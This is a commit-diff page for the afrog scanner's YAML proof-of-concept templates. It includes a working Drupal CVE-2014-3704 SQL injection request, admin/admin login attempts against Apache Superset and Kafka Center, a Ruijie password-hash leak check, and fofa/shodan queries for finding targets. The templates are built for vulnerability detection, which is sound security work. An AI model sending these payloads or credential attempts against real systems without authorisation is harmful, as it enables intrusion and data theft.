crash.software
Projects
Pull Requests
Issues
Builds
afrog
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY afrog Commits 004321db
🤬
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/CNVD/2021/CNVD-2021-14536.yaml
    1 1  id: CNVD-2021-14536
    2 2   
    3 3  info:
    4  - name: 锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞
    5  - author: jweny(https://github.com/jweny)
     4 + name: Ruijie RG-UAC Information Disclosure
     5 + author: jweny(https://github.com/jweny) daffainfo
    6 6   severity: high
     7 + description: |
     8 + fofa-query: 'title="RG-UAC登录页面"'
    7 9   
    8 10  rules:
    9 11   r0:
    10 12   request:
    11 13   method: GET
    12 14   path: /login.php
    13  - expression: response.status == 200 && response.body.bcontains(b"<title>RG-UAC</title>") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body)
     15 + expression: response.status == 200 && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body)
    14 16  expression: r0()
    15 17   
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/CNVD/2021/CNVD-2021-15822.yaml
    skipped 3 lines
    4 4   name: ShopXO File Read
    5 5   author: Print1n(http://print1n.top)
    6 6   severity: high
     7 + reference:
     8 + - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
    7 9   
    8 10  rules:
    9 11   Linux0:
    skipped 12 lines
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/CVE/2014/CVE-2014-3704.yaml
    skipped 4 lines
    5 5   author: unkown
    6 6   severity: high
    7 7   
     8 +set:
     9 + rand: randomInt(200000000, 210000000)
    8 10  rules:
    9 11   r0:
    10 12   request:
    11 13   method: POST
    12 14   path: /?q=node&destination=node
    13  - body: pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a
    14  - expression: response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53")
     15 + body: pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,(select md5({{rand}}))),0)%23]=bob&name[0]=a
     16 + expression: response.status == 500 && response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31)))
    15 17  expression: r0()
    16 18   
    17 19   
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/CVE/2021/CVE-2021-44451.yaml
     1 +id: CVE-2021-44451
     2 + 
     3 +info:
     4 + name: Apache Superset Default Password
     5 + author: dhiyaneshDK
     6 + severity: high
     7 + description: |
     8 + Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
     9 + Users should upgrade to Apache Superset 1.4.0 or higher.
     10 + Fofa: app="APACHE-Superset"
     11 + reference:
     12 + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2021-44451
     14 + 
     15 +set:
     16 + refererUrl: request.url
     17 +rules:
     18 + r0:
     19 + request:
     20 + method: GET
     21 + path: /login/
     22 + expression: response.status == 200
     23 + output:
     24 + search: '"value=\"(?P<cs_token>.*?)\">".bsubmatch(response.body)'
     25 + cs_token: search["cs_token"]
     26 + r1:
     27 + request:
     28 + method: POST
     29 + path: /login/
     30 + headers:
     31 + Referer: "{{refererUrl}}/admin/airflow/login"
     32 + body: |
     33 + csrf_token={{cs_token}}&username=admin&password=admin
     34 + expression: response.status == 302 && response.body.bcontains(b'<title>Redirecting...</title>') && response.body.bcontains(b'<h1>Redirecting...</h1>') && response.body.bcontains(b'<a href="/">') && response.raw_header.bcontains(b'session')
     35 +expression: r0() && r1()
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/default-pwd/kafka-center-default-password.yaml
     1 +id: kafka-center-default-password
     2 + 
     3 +info:
     4 + name: Apache Kafka Center Default Password
     5 + author: dhiyaneshDK
     6 + severity: high
     7 + description: |
     8 + shodan-query: http.title:"Kafka Center"
     9 + 
     10 +rules:
     11 + r0:
     12 + request:
     13 + method: POST
     14 + path: /login/system
     15 + headers:
     16 + Content-Type: application/json
     17 + body: |
     18 + {"name":"admin","password":"admin","checkbox":false}
     19 + expression: response.status == 200 && response.body.bcontains(b'"code":200') && response.body.bcontains(b'"name":"admin"')
     20 +expression: r0()
  • afrog-pocs/unreviewed/CVE-2022-22965.yaml pocs/CVE-2022-22965.yaml
    Content is identical
Please wait...
Page is in error, reload to recover